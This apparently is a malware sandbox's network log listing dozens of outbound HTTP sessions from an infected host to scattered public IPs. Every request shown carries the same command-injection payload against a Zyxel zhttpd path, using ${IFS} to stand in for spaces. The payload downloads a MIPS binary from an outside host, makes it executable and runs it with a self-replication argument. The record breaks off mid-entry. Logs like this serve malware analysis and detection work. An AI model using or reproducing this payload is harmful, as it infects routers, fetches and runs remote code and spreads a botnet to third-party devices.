                                        Jan 14, 2024 16:18:30.127697945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        652192.168.2.1338052140.61.196.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127758026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        653192.168.2.1333922153.159.83.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127794027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        654192.168.2.1334488209.19.81.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127870083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        655192.168.2.135838049.13.170.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127912998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        656192.168.2.1336942123.72.39.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.127968073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        657192.168.2.1338812102.48.140.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128011942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        658192.168.2.1355460121.40.198.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128048897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        659192.168.2.133370268.20.145.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128124952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        660192.168.2.135952260.239.61.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128180027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        661192.168.2.135066814.121.55.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128228903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        662192.168.2.135964268.71.23.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128269911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        663192.168.2.134233687.45.182.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128324986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        664192.168.2.1355032218.182.31.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128369093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        665192.168.2.135630278.72.81.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:30.128413916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        666192.168.2.1340246131.3.222.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145212889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        667192.168.2.1357574208.11.229.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145267010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        668192.168.2.1360764154.50.251.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145297050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        669192.168.2.1337482121.37.101.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145365000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        670192.168.2.1335178177.187.59.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145389080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        671192.168.2.1354084168.229.12.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145457029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        672192.168.2.1352524213.14.134.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145508051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        673192.168.2.1336792100.6.114.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145544052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        674192.168.2.1333476193.107.202.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145586967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        675192.168.2.134466083.108.85.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145617008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        676192.168.2.1357896104.108.203.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145682096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        677192.168.2.1354048101.154.71.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145723104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        678192.168.2.1357334172.73.190.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145778894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        679192.168.2.133408680.138.211.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145801067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        680192.168.2.1356882197.83.133.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145833969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        681192.168.2.1342100191.224.41.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145895958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        682192.168.2.133329635.48.159.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145931005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        683192.168.2.1354166201.100.50.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.145971060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        684192.168.2.1348752177.234.214.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146023035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        685192.168.2.134828842.157.23.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146063089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        686192.168.2.133413868.33.116.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146147966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        687192.168.2.1341996140.160.170.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146153927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        688192.168.2.133367098.29.91.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146200895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        689192.168.2.1359124157.99.152.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146236897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        690192.168.2.1345610156.148.18.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146284103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        691192.168.2.1335282131.181.90.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146332979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        692192.168.2.1338060166.43.125.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146375895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        693192.168.2.1345558202.104.2.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146409988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        694192.168.2.1337068108.131.12.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146452904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        695192.168.2.133295683.218.186.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146502018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        696192.168.2.1339814123.254.148.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146528959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        697192.168.2.13493689.98.19.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146581888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        698192.168.2.1356016188.0.234.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146636963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        699192.168.2.1345594161.177.136.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146681070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        700192.168.2.134768659.90.171.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146723986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        701192.168.2.133720261.57.119.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146764994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        702192.168.2.133794890.38.207.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146809101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        703192.168.2.135325485.26.57.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146858931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        704192.168.2.134838060.121.95.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146893024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        705192.168.2.1359752142.155.28.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146939993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        706192.168.2.1350990146.74.23.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.146984100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        707192.168.2.135300214.29.14.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147003889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        708192.168.2.1355272106.109.29.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147058010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        709192.168.2.135322487.46.15.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147102118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        710192.168.2.134106863.103.5.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147154093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        711192.168.2.1354774176.65.85.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147185087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        712192.168.2.1343056201.240.132.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147229910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        713192.168.2.1335186190.126.108.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:31.147273064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        714192.168.2.1352074189.240.173.252443
                                        TimestampBytes transferredDirectionData
